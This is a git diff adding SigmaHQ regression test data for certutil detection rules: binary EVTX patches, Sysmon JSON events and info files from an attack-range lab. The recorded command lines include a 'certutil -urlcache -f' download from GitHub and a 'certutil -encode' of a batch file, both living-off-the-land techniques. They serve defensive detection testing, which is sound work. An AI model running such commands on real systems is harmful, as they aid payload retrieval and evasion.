zr0ByLUSqn1I#2AGnwn75`>>zFQI|ph7|EMJdE0F+$ypNg+L1ep6dC00!FA?HsuB|T zCf-O)qaSJdkW%kE95N4)2iBR?Q@BnVOh^7QIMR3rF%Y61L_>%iv%YDSsuJrUKGFpm z{h*!!-6X!r2dVO#^9mtwIQ8b&NP-7bH~{Nq!W~uI$xu{ySOfl&g&pThe3dY8POGu4p|Z0Ey;=D6zD$w zZWDSeFLP!zS!DkOV>jO(@=hZ(O}}`7Wj@%PV(xJ7?asLlz9v^ zzxzBL*83G>2J2WgtmCB$tmDP_Xa24j>$v@w2J7${ti$oV`N#x=b!fbcvZz;<&|n<~ z>o8bHB|c=Zj-{}UUSJf&I&Q({U>#RuzYE*V*lxmBjCBAXEWtW%#WC>?rmF_)p#Mkg zfxa7ksF#3s++|}On>JRDb144sbwVd31f z9Lb0+E-22qAQm4q^5HEL?<+B^ob1K;p_em>E)w%3vh2QcUx}6+M4h?1ehk0+fa4s- zbp0rzXooQ6FT~Qat#=(hKmIE`dWawAm;1%hZv}LN9zX93&M5D`9~wi%A`RUkwn0>Y z*QrOm3pRl>L^~J-0Tc~sd2cZ9ztwjYGv2{LH;51rLCE5p_&^qaOvxyRZqV%molejp z&Ol6s@e)KPh=ujzOgXy2(#fgjmNXbGL0m@DB7f~j69+xs{Y*OS2P~DfAhN+YLt+km zw-4(;?1h*PBQm(hdwfZiH6&fedN9I+cu6I?!I%vqIIJ5ZHAu5h)rA}o;m`;Qkqwrw zu_K=EKuSmkt#vC}i;HeVA%BA9I(L02ZaW>xF$Z^xkFV1G(&?4%xhu8FJ$DSYS&luc;Q4uD_ z!+|mk?t$*715Is|B_yHXLp>pk1>frNi|# z-@*bx@Ll;366mE|f-YPnz>-bCcMbB)qVJyuxRb{(BMRFT4#d%J1oncf0$fR8BsSw> zM{qnTM36c_;<2_6Yz9Flu3%_@NYr{zaBMKRxFl+`yiTsD^G8}%^A6c(DsYcoyZ^7h z829*_T?Y3sxW{5_i@`lgqkjzU0aIpTJYeGu?qP6`Li~xdKED+1;ly|_PQ$@HxIcuA zn8QUz2O~Y`w=o8To*%udIB<`HHtzA;E2{UdILVsDG)S*MO)i6a(C?&2 ZSzC-p#x8@Ak&NVUe7FxkmcxaU{|8Xk3=#kU literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/42a5f1e7-9603-4f6d-97ae-3f37d130d794.json b/regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/42a5f1e7-9603-4f6d-97ae-3f37d130d794.json new file mode 100644 index 000000000..27dce7a6b --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/42a5f1e7-9603-4f6d-97ae-3f37d130d794.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:02:36.900637Z" + } + }, + "EventRecordID": 11537869, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:02:36.894", + "ProcessGuid": "5AA13A44-02AC-68FD-7A35-000000004002", + "ProcessId": 6484, + "Image": "C:\\Windows\\System32\\certutil.exe", + "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", + "Description": "CertUtil.exe", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "CertUtil.exe", + "CommandLine": "certutil.exe -urlcache -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/refs/heads/master/atomics/T1001.002/T1001.002.yaml atomic.yaml", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/info.yml b/regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/info.yml new file mode 100644 index 000000000..69a87ef61 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/info.yml @@ -0,0 +1,13 @@ +id: 507f6de5-f414-4825-b1a3-e8909fdc8700 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 42a5f1e7-9603-4f6d-97ae-3f37d130d794 + title: Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/42a5f1e7-9603-4f6d-97ae-3f37d130d794.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_encode/e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.evtx b/regression_data/windows/process_creation/proc_creation_win_certutil_encode/e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.evtx new file mode 100644 index 0000000000000000000000000000000000000000..a244931086d9dd6905d25e1ea055ae4443ab3b98 GIT binary patch literal 69632 zcmeHQdu&_Rc|W8mijquGa_q!$9;4GXvmHyOBvPW{xG_aiwra_7WZ7;4t&XgRDMznL zbR0K9XLL=5EW_NQ3x;+Z&}7}xHCxspC{i@T3^XeWbXc6Ee*_(hAVAQe>jG>^5HzW6 zXusb%_v-TU-b;~sv@&uiUGhH8`ObH~^PR`{JKs4sJ2~DnF*zoRKYruJdHniCl@N`- z;vg%&PJMLw(<>&T31|su31|su31|su31|su31|su31|su31|su2`njr?BsYlH~pY6 zt$VNE^P~h&;KL>%+Fp8~VM)SE1YkOEzxe3q3WMDe6k>Zwi1(|7_+_B*i4ccze=lH& zNH3;eTS>=e@tgz40P`?#A_p21v5CD2*wD7UTZCao&%xJ)rr6 zB03CH?#BliEa!8(3Ff#&-nkR`h=|4V|GOuj&b^lXxi8}Li4DH1C#Rdu*gU^`;nMxz zO7>iN`?-zZdLB7ps8o}92B*v*KR?(|EwbVvF(#%(9@l@2BY4_)_%D%a@vxW@lXy6f z2i3lW$RSu>%!)h3Zv4%Q5!@L=m|>i^;CBLd=EMxHX2du`w%~dO_jil4cs7mSHW9;L z9A`0+#P`@@^7FPUzi(mTJ(QJMZZm^HaYUR0<-AN03Z7b6xDR}pCHn3oA#qry{t(g{ zMW{JE?ZDAvD&xVY0^$&uox(#Q8XANz_*p|Ac5Dua{o;&_iANC;sY+Feegyl15#od4 zngU_Cw z=o3*~unO?={H;N84+@aQLJ=`JA1PIfPvXL?Ij1j$#6dhhhjN>N97iE{2CWvG0}%UR zTzu7_xaZI6k?4e!X&OPtzyOPA6k()zSc|ArcRf;PD?u|7#1j-vRlYiCi`AC&RD}zq zJph7anVcxe`y1*+9eH^Sk<13+nfK~NS_UH@ladottV0Ob(__@|x_9eD3Ka8ToZ6B{ zP8HpT8W9PyQDCtre$*tGw4%g3c|;0RT^1ImkcQcaeE)m3$iTyr@iQ_ZRlEnt2TD_r zm%2A<4V@i9z6x0+{fy}A8;;;7Igt&8}*{H6~$ngk@g(aHD_lS59 zPf7h0qO?FRGq^{6XGwG;0ketzW=jZ#%|bha7)roG{2oFC&DMInFDQ;8$4uME^#*ZW zRiL3sYzv5u2nxlN2lN=-naX2GY!)Gbjt!px&Ul1GoeYQQ@_r0gjUplr;P-OvHc7?o zE5&)U)qH1z5Z^{?`Ug*bSH`MFRpF2Bx1wWX$aQSDI#@{V#B}GA5E1jiWRnz{(-h9&RPe26P zdK1OTP$=QoamqfKpUju2erD62kz|K)pRHyWe%VJ;3;$#$fR>Dj^68B@f^03Tk=y{v zZW6^~wwV4fii8FIDI@+3R_GcOWgZeUE44oiju^Jt2rG+TQLZmid9&H|hy5bLI6I6u zH(B(Z)nruo!&M^0@Y{^=EPaFfYN!;uCF-d^3^nrPr3cbxF73^*KU`fRP6pxG`BAfH z7t6~Z4wjIQ>Y7F&Q#L#Pa7~G@Y{OVJS<}uTY)FOeH1bLL82N03-jIt^IHnPPQkeO% zO0Bj;PE<;i6g9g~QlZ39p(rue6w|U!vxViTA%i$PXRg>llizw3n`KTtV{J9~4J=l9 ze|UomtEK57k$dV^l?X$x7A|L*6gX*YEO~1q9pb0w4dd9(uk{H`5HodCW zsrV74S?xv+n5L0~251)ZJqG^Fmd)y!{b9DY;PMkj%*|HJAQ~hNlsIIX2aioEq$`hy z5z>^f(j2pcu;j5($s=K;Bs*JG!y>3*Uh!4_u2cE*sGU~a!dkScOn$v|YO{*ZvY=Mn zVo9dX#;@5a_`}yDMnJHc@uMkkF`9KY`TKC*hhqy4HuF1;^F#RU#?gj@T>!fa)kXNk z<7g#$kJlY|ewPuhSq@6uL;`JkD~6@KPKYSZJ2BAZVD(PiX+!!k`8;#y)AwIrbv5@G zB`@~*{}i1_8exWtdWa$0aHky`K2sdE%D72f#l#NqqS9cCT$qNlPkJ7d?Y$cBaC~U>MC|LMwwyTW zMCD*&4)NFmSUs2*C&f~TB86t8ISu)!acNYJpV=PCW%el9| zF+e2{<}b#%&_}k%Imqk)Xtj#HC_(B{7Fxy9>_!`%me*;Nawo1^@!JZ{5;A-z@{~a6 zxD1;_=mfMPiNA~ycNfMd480fONwXEdUHI)lILd=}(=tRH_gjrvN?*D_xea#{pqCQ6 z3@)kh9iT_5-IBMYSH*5KJYDdr9!qi@Y6{lB4|gLZjP|mu`e7Wu~1*=oJ29xSPbiR(U^z zXH1WOX&fC$ll6!t^-knUZad8>)Yflqsid|}$(p9>=xv}|ZY{URi-OxqH4Myh^hSH% zX&JX+h~{n)rx4HG622WzdR#1EcguG#Lc3YKavWEtrMne0N?N$rBY>x6y9p0HELs#{ zDNB|%@e&s7J_IRcxyo!VZLvz3R+VX~(mE_&`#kYD)3U7pYh_thty{}d z?B83n<F?Glr=V6n{WZPW_K@P<`ew&VyW&S5k&hEbH4_kEeT`Hr?4%BUJ~h}zR)uChikR0TTUNA=3N5Wahm{l% zn?x+AtSVYo7XLlQ|Cm73CmktQ|f4x}H0?8Y#5eYETm=RwdMfZdXX zRosoy<`JA(6yu;ZhMbIfQk+Mg%&8S+spgSSA|$joElM2mkAhlk6)17sKe`H(IziDsrMd+UZHDaH>w}(;4U&YcsDb zeIo9`iNLNEQyQ1`rmX@xO217!zXf_eg+KC0ERe>R!s=KnTMX_wS;W?S7NKV3)RCHK zv~onNb{HjJe%)OwK8OW)*HdQ+tqmWYkVT>*O<5~G*j^_qD3`)ERcUPot!p1zXd(_H zXmd(Qx15%qtvqMgPA&rSsz}T#)|llMl2w~4Icl9ucvUxX(&IdiK_r96Px18<4vl80wGZ0!1GT7l z&4Tv);MxQ2`B7p`!AlM_V=!e$Gr}6p&}fE6GYVJRRr?~C`POKLZN1I9_WT%HS7^q} zPp{-&iJ?xxeiq9vqxmnlik3+U9dY-&(Cbl#jCEgT`?7lLVlR~hc5Nz^Qg zz1`G)tlXEcA6?rQ-0%+5;Ar`u0=(njasGnFJH{Y0`L+(dVnyQ}+;~aj z9hJQW;{^xa@$x-(yrWU$9UAXIGpq3qjdxtLc*o$n!aFwJcRBZ}fp`1^-et2i-l1OD z!*{6UvEwMcJWj!)ce|^x4vlq~e(~D3qdbH{`*vvGj$%#GdySU!wwu-7Yt%G0d@mPZ z9e;!KCpFfgu@1dbMXyv@!5crHbYLBU0Xx>wq_GZ-b!e0ciw0Wqu4Ta_p;C!hQ=_8HAQ0>zY7e* zG$Qi1;PvK!E#z?(C%@1bhQ=^7hM_Tx6<`>@a9|i42JINeMvY-;3`1iW8pF7jF^tF8 z6^3!c)+@PTZvTxPM)Qm7Q;r&Mex$!a3dqHj^vh6thH}kH9`1;9c$UHMS$J$r;&&L~ z7~cNI?gffvzX>dK)+2^??pNfMbUeaVx%~MvEej?k;I|*A{G8s+l%z{F*`bP zokmAAI)X~3SF`BVEZ6L6mi6^E*{^K4lDl{d>J-qCeRyw;yN8E!_X)ihskxJ)_Vv)d z9>laXn(?Sd>*17)MlaVrHzVljOCfO(aQ!)e{+s|H z;IFM*aYkFY8=(hK6nW6XU9Oe;tiuN&eNS%swd~J*?`#m_+Yup#{^GkxONc6;PySXj z>3*OLBT&d0DC7)gnDUriIxgp|%yCGw(F09MG~z^Z_V~^pzLmb%7yMx2!sVY;8h^LA z2QyYgM>!X!5RPHYf~hTf_wTLQa%rOf$gW;ry6W^tzxh>_+Pv4du<#~MGheDTmN!o$ zaz>IEMkf5Jg@rx%wcBr>z@6a1r|fgSAu#~0n*;}k3|q$^Mgassq02#Gn;V51aTJM< zEbb@k5BpU7enC35vApL`@2&b7bj72BNa%=olYBk zQ(B=*qa`Snr{QtbX}%HSQS^|9FqA$7O*@Y7?brd<{7a%-+mK!i+Lx4GF|6-9O2o-R z_8ElffR?tSW$1?Pb|IDW<4~K@s6WYy;;_V1NUQvGGBSJ`9F`l0(&$92F36-*oF4FQ z$}NSww7lKYwh#ynHdinKwCO0`N(^e=rd%p9&`o+$ zabgKx8qHRyy<}~zRHIiWW$HUUz$)K$q4F5)F9mv5_dO|11EW*69w#BEama~(9J{cM zO9IbIqyJ<7nMY4Zjj>unYU()tI#*mutJxBc$Xs~Uh4Qp7j@*+cFDlM{p4QPMjvQ*# zG`#*SDYc?Tk3mx2w2Et|yC$!uj8?n1s9ZBEk3miL*5!V~SRQM%sJDx&%F8Ei}&6irpWI`ziksxZ3RhY*p&`T^Nc zDs)i2nZ@5wC+cYEO@Zb!@72q;b55qm9qvv1L|{xw50Q84&JDkFPJ5(4HSCC{#_G`O%}MMqU$k06V|CVBgxU322(xKX`NQ=Jfh_wSyM;)mMP&o1 z1Oz~HOjYFH*X%T1fMiHG>STWW*j&?)U5X+M4fTh`m{8oZ3lt;H6IX?;7UUFP6zr?7BKCCX? zxTG4#(9w%-;ZT+~`w(y%BF1ZpK$f<<6}El^W78wxh9x^HQIHcjE1uD8alE5;L}CzX zMzb0Drk^$6H97;EdtRIXr36YZA$5bcJMnO07~?n}#WzE=z@Be`EMh1R>SqhS+Yl>` zr_+++7|wXTd_07*j+H>IJ}y#dg^aziyXDm;mgp#slb%|?T)ISeJMiaKn?5e3rgc{% zn%2yvMl=Tj&!jP$8^G@&%b9t{3Uu{IwgcQ2bk|rf5Y9{>F*RSNBh!KX^=Wo2t zdnVcfv(yN{KD&JwJ>FT29_P>>=kQB!gCW3BoOO@kY6yei^6h z+y62Jq1*9N4{yX`pUX3_80jNv_*|ClRcEK85JCLJ z>?u1R=DUxN$$obpxu6}p=v7%Zoebj7!xEYUh1tbfC4V@m_$k{jR>@-&GuE7h@`r0G zjITTcW?{`wW9rHuHasQ|I%L`ICd)>61ThDva7=^7qF==#yJ1?26T8%DRH`wc{Q+E=FF})coURUZvu;cGX5~}*h+js`;g`- zsVV!xmC}4n`H@E1C2i4ATHhcxGk)0~(1TKA)!s-fsUuPYO$}BwBNciq_e$Av$7pH+ zCqMf@m6NNJkZ+@sQl~?{a=NzIOFRfva~O4kBiVVxZc?$!&fj6gHcQ*yN?0=ASfQV? zH%%q4>nik9E~Ho33T;|JUcKteW<|5?nTJB&teJ=FK_wt=KoJ(tJa85Q^|Gwe7 zntOn4K5VF8UT@k^hoOV?;9;vw^g1r>AnTrK|Bx1+(o!mn<8>ZIeNk&Q&Ki0aMO()i zAGT7KU%+fZ`es_U89sf5v`g`Jn~1`ndJ5k;(p#?R9b{=ci9PU#F%7e`;DXv=d zwrlxp5Py}}!j$oaW0!Mpe`A0`7Ur)X=Lb;RPk}qmM5G|cy(lAExWwS%@R!U0f2Ge< z53cDcN{`PJ{$Ty$FDtJS$U{mVZPEuci~F3vAl{x7yWoADLA<@VOMgn`TbcqbV#AEb zl<0NZ2}vXnDkf8;oy_Ybjug(bprp8@e|iV##qmuaRhB+IWf?AkkO_H4zf$gWPTsPh z!aT+BN4`m!9Plo4LJ!nV&`99BM~2FR`!vGQ3%(Wc)1XB!!48CEI=r(BYx z)QCc%Txwveo2Z0F6r6ZZ6UOKoQ7A;<)*4aR2Q;7$M-0aS96NCkA;{oZZA2j{aRuc; zM2|FDyRQRL_?&?#gl;qu1^b+<+ulHIZ1g&cTE!9+joX}j&TwG@T*f^~Gl!ta4CuP_7J>KT-l!a6!( z`NwgtFbX08#66ORZQqXbZix+a;aA}Y@dB)aXh9aSJMm3qgLp_cw1xNSk3~&QNa|Uf zCvg>rP7uu?RuXey9j%C+kvKv-!qTga=mAq8VnPIkm_`r6WD!!Gn;fPk8qonRTP1bw zFHIT@NB+{dQg{b35TYGKLt638d=Y!;biq1^j}Rg1kw{4fG1HO{QssT-k2QqP$*)=^ z%e<;J!>p$tAMXj%*bu)i@Sb=B=NGm2gnomSeuI_Xqj?3pS6y^?PyB1_fxjxmI_~{1 zjdl3eaQCVdkRr5bL-LhlzD;#W}qww&S=RN1^uwJuM2oCq9j9dQdRjQr;89I%xm3;G0$%ZK#XD zI_@*DjxC$Z$2#&*qdwUjCxjt_Umfz~39S02RQJ@}NA!hEv7X|h~@2z4a XBMRRJ#n(LM){EDotu^vdAd~+GRacpH literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_encode/e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.json b/regression_data/windows/process_creation/proc_creation_win_certutil_encode/e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.json new file mode 100644 index 000000000..e27376def --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_encode/e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:04:22.017117Z" + } + }, + "EventRecordID": 11570013, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:04:22.010", + "ProcessGuid": "5AA13A44-0316-68FD-8535-000000004002", + "ProcessId": 3980, + "Image": "C:\\Windows\\System32\\certutil.exe", + "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", + "Description": "CertUtil.exe", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "CertUtil.exe", + "CommandLine": "certutil -encode file.bat file_.base64", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_encode/info.yml b/regression_data/windows/process_creation/proc_creation_win_certutil_encode/info.yml new file mode 100644 index 000000000..cbffd1a7d --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_encode/info.yml @@ -0,0 +1,13 @@ +id: 70e4269e-9d3c-4bfb-ad84-0b63124ad0a2 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a + title: File Encoded To Base64 Via Certutil.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_certutil_encode/e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/ea0cdc3e-2239-4f26-a947-4e8f8224e464.evtx b/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/ea0cdc3e-2239-4f26-a947-4e8f8224e464.evtx new file mode 100644 index 0000000000000000000000000000000000000000..a244931086d9dd6905d25e1ea055ae4443ab3b98 GIT binary patch literal 69632 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 